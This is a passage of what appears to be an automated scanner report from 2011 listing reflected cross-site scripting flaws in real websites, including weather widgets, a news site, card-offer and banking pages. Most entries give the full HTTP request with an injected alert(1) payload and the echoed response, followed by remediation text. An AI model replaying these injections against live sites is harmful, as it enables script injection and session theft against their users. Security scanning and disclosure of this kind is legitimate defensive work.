GET /adcbin/netweather_v2/netweatherV2ex.asp?partner=netweather&tStyle=normal&logo=1&zipcode=10025&lang=engdacc4"%3balert(1)//bc4341ec3d3&size=12&theme=clouds&metric=0&target=_self HTTP/1.1 Host: netweather.accuweather.com Proxy-Connection: keep-alive Referer: http://www.online6health.com/HEALTH/Acai-Berry/index.php Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 16:17:56 GMT Server: PWS/1.7.1.2 X-Px: ms jfk-agg-n11 ( jfk-agg-n32), ms jfk-agg-n32 ( origin>CONN) Cache-Control: max-age=3360 Expires: Thu, 03 Feb 2011 17:13:56 GMT Age: 0 Content-Type: text/javascript Vary: Accept-Encoding Connection: keep-alive Content-Length: 3913
//v1.0 function AC_AddExtension(src, ext) { if (src.indexOf('?') != -1) return src.replace(/\?/, ext+'?'); else return src + ext; }
function AC_Generateobj(objAttrs, params, e ...[SNIP]... Type; return ret; }
The value of the logo request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 32db1"%3balert(1)//42b70526543 was submitted in the logo parameter. This input was echoed as 32db1";alert(1)//42b70526543 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adcbin/netweather_v2/netweatherV2ex.asp?partner=netweather&tStyle=normal&logo=132db1"%3balert(1)//42b70526543&zipcode=10025&lang=eng&size=12&theme=clouds&metric=0&target=_self HTTP/1.1 Host: netweather.accuweather.com Proxy-Connection: keep-alive Referer: http://www.online6health.com/HEALTH/Acai-Berry/index.php Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 16:16:57 GMT Server: PWS/1.7.1.2 X-Px: ms jfk-agg-n11 ( jfk-agg-n38), ms jfk-agg-n38 ( origin>CONN) Cache-Control: max-age=3420 Expires: Thu, 03 Feb 2011 17:13:57 GMT Age: 0 Content-Type: text/javascript Vary: Accept-Encoding Connection: keep-alive Content-Length: 3913
//v1.0 function AC_AddExtension(src, ext) { if (src.indexOf('?') != -1) return src.replace(/\?/, ext+'?'); else return src + ext; }
function AC_Generateobj(objAttrs, params, e ...[SNIP]... RunNetWeather ("id","netWxV2","minversion","8,0,0,0","movie","http://netwx.accuweather.com/netWx-V212?zipcode=10025&customtheme=&theme=clouds&metric=0&target=_self&lang=eng&url=&video=&category=&logo=132db1";alert(1)//42b70526543&tStyle=normal&partner=netweather&myspace=0","src","http://netwx.accuweather.com/netWx-V212?zipcode=10025&customtheme=&theme=clouds&metric=0&target=_self&lang=eng&url=&video=&category=&logo=132db1";ale ...[SNIP]...
The value of the metric request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2096f"%3balert(1)//1ba13126b12 was submitted in the metric parameter. This input was echoed as 2096f";alert(1)//1ba13126b12 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adcbin/netweather_v2/netweatherV2ex.asp?partner=netweather&tStyle=normal&logo=1&zipcode=10025&lang=eng&size=12&theme=clouds&metric=02096f"%3balert(1)//1ba13126b12&target=_self HTTP/1.1 Host: netweather.accuweather.com Proxy-Connection: keep-alive Referer: http://www.online6health.com/HEALTH/Acai-Berry/index.php Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 16:19:10 GMT Server: PWS/1.7.1.2 X-Px: ms jfk-agg-n11 ( jfk-agg-n26), ms jfk-agg-n26 ( origin>CONN) Cache-Control: max-age=3300 Expires: Thu, 03 Feb 2011 17:14:10 GMT Age: 0 Content-Type: text/javascript Vary: Accept-Encoding Connection: keep-alive Content-Length: 3913
//v1.0 function AC_AddExtension(src, ext) { if (src.indexOf('?') != -1) return src.replace(/\?/, ext+'?'); else return src + ext; }
function AC_Generateobj(objAttrs, params, e ...[SNIP]... edAttrs["type"] = mimeType; return ret; }
The value of the partner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 37e8c"%3balert(1)//8d39e9c745 was submitted in the partner parameter. This input was echoed as 37e8c";alert(1)//8d39e9c745 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adcbin/netweather_v2/netweatherV2ex.asp?partner=netweather37e8c"%3balert(1)//8d39e9c745&tStyle=normal&logo=1&zipcode=10025&lang=eng&size=12&theme=clouds&metric=0&target=_self HTTP/1.1 Host: netweather.accuweather.com Proxy-Connection: keep-alive Referer: http://www.online6health.com/HEALTH/Acai-Berry/index.php Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 16:16:21 GMT Server: PWS/1.7.1.2 X-Px: ms jfk-agg-n11 ( jfk-agg-n26), ms jfk-agg-n26 ( origin>CONN) Cache-Control: max-age=3060 Expires: Thu, 03 Feb 2011 17:07:21 GMT Age: 0 Content-Type: text/javascript Vary: Accept-Encoding Connection: keep-alive Content-Length: 3911
//v1.0 function AC_AddExtension(src, ext) { if (src.indexOf('?') != -1) return src.replace(/\?/, ext+'?'); else return src + ext; }
function AC_Generateobj(objAttrs, params, e ...[SNIP]... nversion","8,0,0,0","movie","http://netwx.accuweather.com/netWx-V212?zipcode=10025&customtheme=&theme=clouds&metric=0&target=_self&lang=eng&url=&video=&category=&logo=1&tStyle=normal&partner=netweather37e8c";alert(1)//8d39e9c745&myspace=0","src","http://netwx.accuweather.com/netWx-V212?zipcode=10025&customtheme=&theme=clouds&metric=0&target=_self&lang=eng&url=&video=&category=&logo=1&tStyle=normal&partner=netweather37e8c";ale ...[SNIP]...
The value of the tStyle request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2cc6"%3balert(1)//085e153a142 was submitted in the tStyle parameter. This input was echoed as c2cc6";alert(1)//085e153a142 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adcbin/netweather_v2/netweatherV2ex.asp?partner=netweather&tStyle=normalc2cc6"%3balert(1)//085e153a142&logo=1&zipcode=10025&lang=eng&size=12&theme=clouds&metric=0&target=_self HTTP/1.1 Host: netweather.accuweather.com Proxy-Connection: keep-alive Referer: http://www.online6health.com/HEALTH/Acai-Berry/index.php Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 16:16:38 GMT Server: PWS/1.7.1.2 X-Px: ms jfk-agg-n11 ( jfk-agg-n28), ms jfk-agg-n28 ( origin>CONN) Cache-Control: max-age=3180 Expires: Thu, 03 Feb 2011 17:09:38 GMT Age: 0 Content-Type: text/javascript Vary: Accept-Encoding Connection: keep-alive Content-Length: 3913
//v1.0 function AC_AddExtension(src, ext) { if (src.indexOf('?') != -1) return src.replace(/\?/, ext+'?'); else return src + ext; }
function AC_Generateobj(objAttrs, params, e ...[SNIP]... ("id","netWxV2","minversion","8,0,0,0","movie","http://netwx.accuweather.com/netWx-V212?zipcode=10025&customtheme=&theme=clouds&metric=0&target=_self&lang=eng&url=&video=&category=&logo=1&tStyle=normalc2cc6";alert(1)//085e153a142&partner=netweather&myspace=0","src","http://netwx.accuweather.com/netWx-V212?zipcode=10025&customtheme=&theme=clouds&metric=0&target=_self&lang=eng&url=&video=&category=&logo=1&tStyle=normalc2cc6";ale ...[SNIP]...
The value of the target request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4df0b"%3balert(1)//aada13118d6 was submitted in the target parameter. This input was echoed as 4df0b";alert(1)//aada13118d6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adcbin/netweather_v2/netweatherV2ex.asp?partner=netweather&tStyle=normal&logo=1&zipcode=10025&lang=eng&size=12&theme=clouds&metric=0&target=_self4df0b"%3balert(1)//aada13118d6 HTTP/1.1 Host: netweather.accuweather.com Proxy-Connection: keep-alive Referer: http://www.online6health.com/HEALTH/Acai-Berry/index.php Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 16:19:31 GMT Server: PWS/1.7.1.2 X-Px: ms jfk-agg-n11 ( jfk-agg-n8), ms jfk-agg-n8 ( origin>CONN) Cache-Control: max-age=2760 Expires: Thu, 03 Feb 2011 17:05:31 GMT Age: 0 Content-Type: text/javascript Vary: Accept-Encoding Connection: keep-alive Content-Length: 3913
//v1.0 function AC_AddExtension(src, ext) { if (src.indexOf('?') != -1) return src.replace(/\?/, ext+'?'); else return src + ext; }
function AC_Generateobj(objAttrs, params, e ...[SNIP]... "] = mimeType; return ret; }
The value of the theme request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e337d"%3balert(1)//a1ece0aaeff was submitted in the theme parameter. This input was echoed as e337d";alert(1)//a1ece0aaeff in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adcbin/netweather_v2/netweatherV2ex.asp?partner=netweather&tStyle=normal&logo=1&zipcode=10025&lang=eng&size=12&theme=cloudse337d"%3balert(1)//a1ece0aaeff&metric=0&target=_self HTTP/1.1 Host: netweather.accuweather.com Proxy-Connection: keep-alive Referer: http://www.online6health.com/HEALTH/Acai-Berry/index.php Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 16:18:53 GMT Server: PWS/1.7.1.2 X-Px: ms jfk-agg-n11 ( jfk-agg-n4), ms jfk-agg-n4 ( origin>CONN) Cache-Control: max-age=3180 Expires: Thu, 03 Feb 2011 17:11:53 GMT Age: 0 Content-Type: text/javascript Vary: Accept-Encoding Connection: keep-alive Content-Length: 3913
//v1.0 function AC_AddExtension(src, ext) { if (src.indexOf('?') != -1) return src.replace(/\?/, ext+'?'); else return src + ext; }
function AC_Generateobj(objAttrs, params, e ...[SNIP]... ) ret.embedAttrs["type"] = mimeType; return ret; }
The value of the zipcode request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c8162"%3balert(1)//ba94b6bb5ca was submitted in the zipcode parameter. This input was echoed as c8162";alert(1)//ba94b6bb5ca in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adcbin/netweather_v2/netweatherV2ex.asp?partner=netweather&tStyle=normal&logo=1&zipcode=10025c8162"%3balert(1)//ba94b6bb5ca&lang=eng&size=12&theme=clouds&metric=0&target=_self HTTP/1.1 Host: netweather.accuweather.com Proxy-Connection: keep-alive Referer: http://www.online6health.com/HEALTH/Acai-Berry/index.php Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 16:17:32 GMT Server: PWS/1.7.1.2 X-Px: ms jfk-agg-n11 ( jfk-agg-n34), ms jfk-agg-n34 ( origin>CONN) Cache-Control: max-age=2820 Expires: Thu, 03 Feb 2011 17:04:32 GMT Age: 0 Content-Type: text/javascript Vary: Accept-Encoding Connection: keep-alive Content-Length: 3913
//v1.0 function AC_AddExtension(src, ext) { if (src.indexOf('?') != -1) return src.replace(/\?/, ext+'?'); else return src + ext; }
function AC_Generateobj(objAttrs, params, e ...[SNIP]... uginsPage; if (mimeType) ret.embedAttrs["type"] = mimeType; return ret; }
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5ef3"><script>alert(1)</script>3b1abce3997 was submitted in the REST URL parameter 5. This input was echoed as b5ef3\"><script>alert(1)</script>3b1abce3997 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/03/disney-parks-renovate-9-attractions-other-areas/68810b5ef3"><script>alert(1)</script>3b1abce3997/ HTTP/1.1 Host: ocresort.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:15:25 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://ocresort.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:15:25 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 56355
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... alternate" type="application/rss+xml" title=" Page not found - Around Disney - www.ocregister.com" href="http://ocresort.ocregister.com/2011/02/03/disney-parks-renovate-9-attractions-other-areas/68810b5ef3\"><script>alert(1)</script>3b1abce3997/feed/" /> ...[SNIP]...
4.413. http://ocresort.ocregister.com/2011/02/03/disney-parks-renovate-9-attractions-other-areas/68810/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f4a3"><script>alert(1)</script>ebc82fd6548 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8f4a3\"><script>alert(1)</script>ebc82fd6548 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/03/disney-parks-renovate-9-attractions-other-areas/68810/?8f4a3"><script>alert(1)</script>ebc82fd6548=1 HTTP/1.1 Host: ocresort.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:15:05 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://ocresort.ocregister.com/xmlrpc.php Link: <http://ocresort.ocregister.com/?p=68810>; rel=shortlink Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 78618
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http: ...[SNIP]... " title=" Disney parks renovate 9 attractions, other areas - Around Disney - www.ocregister.com" href="http://ocresort.ocregister.com/2011/02/03/disney-parks-renovate-9-attractions-other-areas/68810/?8f4a3\"><script>alert(1)</script>ebc82fd6548=1feed/" /> ...[SNIP]...
4.414. http://offers.amexnetwork.com/portalext/inline/back_support_mock_ie.jsp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://offers.amexnetwork.com
Path:
/portalext/inline/back_support_mock_ie.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 457ed'-alert(1)-'43bbf2ba26d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /portalext/inline/back_support_mock_ie.jsp?457ed'-alert(1)-'43bbf2ba26d=1 HTTP/1.1 Host: offers.amexnetwork.com Proxy-Connection: keep-alive Referer: http://offers.amexnetwork.com/selects/us/grid?categoryPath=/amexnetwork/category/Shoppinga21a4%22%3E%3Cscript%3Ealert(1)%3C/script%3E9146dd0abe&issuerName=us_prop&inav=menu_rewards_shopping Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: IBM_HTTP_Server Surrogate-Control: no-store Content-Type: text/html;charset=UTF-8 Content-Language: en-US Vary: Accept-Encoding Cache-Control: no-cache Expires: Thu, 03 Feb 2011 15:39:08 GMT Date: Thu, 03 Feb 2011 15:39:08 GMT Connection: close Content-Length: 125
<script> function getLocation() { return '457ed'-alert(1)-'43bbf2ba26d=1'; }
The value of the categoryPath request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a21a4"><script>alert(1)</script>9146dd0abe was submitted in the categoryPath parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /selects/us/grid?categoryPath=/amexnetwork/category/Shoppinga21a4"><script>alert(1)</script>9146dd0abe&issuerName=us_prop&inav=menu_rewards_shopping HTTP/1.1 Host: offers.amexnetwork.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: IBM_HTTP_Server Content-Type: text/html; charset=UTF-8 Content-Language: en-US Cache-Control: no-cache Expires: Thu, 03 Feb 2011 14:22:55 GMT Date: Thu, 03 Feb 2011 14:22:55 GMT Connection: close Connection: Transfer-Encoding Content-Length: 215250
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the issuerName request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13a13"><script>alert(1)</script>8d46a60ecb1 was submitted in the issuerName parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /selects/us/grid?categoryPath=/amexnetwork/category/Shopping&issuerName=us_prop13a13"><script>alert(1)</script>8d46a60ecb1&inav=menu_rewards_shopping HTTP/1.1 Host: offers.amexnetwork.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: IBM_HTTP_Server Content-Type: text/html; charset=UTF-8 Content-Language: en-US Cache-Control: no-cache Expires: Thu, 03 Feb 2011 14:27:34 GMT Date: Thu, 03 Feb 2011 14:27:34 GMT Connection: close Connection: Transfer-Encoding Content-Length: 291329
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the issuerName request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 82cc0"%3balert(1)//5ac35aa2ed1 was submitted in the issuerName parameter. This input was echoed as 82cc0";alert(1)//5ac35aa2ed1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /selects/us/grid?categoryPath=/amexnetwork/category/Shopping&issuerName=us_prop82cc0"%3balert(1)//5ac35aa2ed1&inav=menu_rewards_shopping HTTP/1.1 Host: offers.amexnetwork.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: IBM_HTTP_Server Content-Type: text/html; charset=UTF-8 Content-Language: en-US Cache-Control: no-cache Expires: Thu, 03 Feb 2011 14:28:36 GMT Date: Thu, 03 Feb 2011 14:28:36 GMT Connection: close Connection: Transfer-Encoding Content-Length: 287293
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the issuerName request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bae6e'%3balert(1)//ad3a1fe5923 was submitted in the issuerName parameter. This input was echoed as bae6e';alert(1)//ad3a1fe5923 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /selects/us/grid?categoryPath=/amexnetwork/category/Shopping&issuerName=us_propbae6e'%3balert(1)//ad3a1fe5923&inav=menu_rewards_shopping HTTP/1.1 Host: offers.amexnetwork.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: IBM_HTTP_Server Content-Type: text/html; charset=UTF-8 Content-Language: en-US Cache-Control: no-cache Expires: Thu, 03 Feb 2011 14:29:41 GMT Date: Thu, 03 Feb 2011 14:29:41 GMT Connection: close Connection: Transfer-Encoding Content-Length: 287293
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
...[SNIP]... .do?localLocale=en-us&categoryPath=/amexnetwork/category/Shopping&localCountryId=ccfb43b68d898110VgnVCM2000007cc6410aRCRD&pocsort=2&countryId=ccfb43b68d898110VgnVCM2000007cc6410aRCRD&issuerName=us_propbae6e';alert(1)//ad3a1fe5923', { method:'GET', onComplete:parseXml }); } function parseXml(response) { var responseXml = response.responseXML; //alert(responseXml); var m ...[SNIP]...
The value of the adid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b4a7"><script>alert(1)</script>c726bd08fb8 was submitted in the adid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?keyword=online%20banking&adid=3b4a7"><script>alert(1)</script>c726bd08fb8 HTTP/1.1 Host: onlinecheckingsbanking.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the keyword request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8916"><script>alert(1)</script>2d8d0fb1f0b was submitted in the keyword parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?keyword=b8916"><script>alert(1)</script>2d8d0fb1f0b&adid=289819058 HTTP/1.1 Host: onlinecheckingsbanking.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
4.421. http://onlinecheckingsbanking.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://onlinecheckingsbanking.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b820e"><script>alert(1)</script>6f57152ba82 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?keyword=online%20banking&adid=289819058&b820e"><script>alert(1)</script>6f57152ba82=1 HTTP/1.1 Host: onlinecheckingsbanking.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the term request parameter is copied into the HTML document as plain text between tags. The payload 9183b<script>alert(1)</script>6fd4fa2c65b was submitted in the term parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /search.php?d=peoplesbank.com&cachekey=1296747318&rc=true&term=Internet+banking9183b<script>alert(1)</script>6fd4fa2c65b&append= HTTP/1.1 Host: peoplesbank.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sid=n94u5lhrbr0a5c7as50gdp2tc0;
Response
HTTP/1.1 200 OK X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache P3P: CP="NOI COR NID ADMa DEVa PSAa PSDa STP NAV DEM STA PRE" Cache-Control: no-cache Content-type: text/html Connection: close Date: Thu, 03 Feb 2011 15:41:42 GMT Server: lighttpd Content-Length: 18861
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <meta name="au ...[SNIP]... <span class="searchedfor">INTERNET BANKING9183B<SCRIPT>ALERT(1)</SCRIPT>6FD4FA2C65B</span> ...[SNIP]...
The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 346ad'%3balert(1)//f0a82ea655a was submitted in the admeld_callback parameter. This input was echoed as 346ad';alert(1)//f0a82ea655a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.0 200 OK Server: IM BidManager Date: Thu, 03 Feb 2011 19:02:42 GMT P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Expires: Thu, 03-Feb-2011 19:02:22 GMT Content-Type: text/javascript Pragma: no-cache Cache-Control: no-cache Content-Length: 368
The value of the jpcb request parameter is copied into the HTML document as plain text between tags. The payload d5e7e<script>alert(1)</script>1fda4ce402e was submitted in the jpcb parameter. This input was echoed unmodified in the application's response.
